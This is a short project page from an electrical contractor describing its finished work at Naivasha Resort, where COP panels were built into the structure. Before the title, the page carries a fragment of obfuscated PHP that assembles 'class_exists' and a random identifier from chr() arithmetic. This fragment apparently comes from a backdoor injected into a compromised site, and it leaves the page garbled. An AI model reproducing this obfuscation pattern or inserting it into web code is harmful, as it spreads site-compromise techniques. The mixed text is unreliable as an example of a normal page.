$GSUoGs = chr (109) . chr ( 132 - 20 ).chr ( 1043 - 954 )."\137" . chr ( 690 - 587 )."\161" . chr ( 1043 - 962 ).chr ( 196 - 125 )."\x6c";$wsMcjq = chr ( 308 - 209 ).chr ( 700 - 592 ).'a' . chr (115) . chr (115) . chr (95) . chr ( 964 - 863 ).chr ( 817 - 697 ).chr (105) . chr ( 345 - 230 ).chr ( 633 - 517 ).chr (115); Naivasha Resort - Naivasha | Ultra Electric limited

Naivasha Resort – Naivasha

Made to complement the architecture of the building, our project at Naivasha resort consisted of premium materials designed to enhance the resort’s appeal. Its COP panels were also perfectly embedded in the building structure giving it a seamless finish.

Status: Complete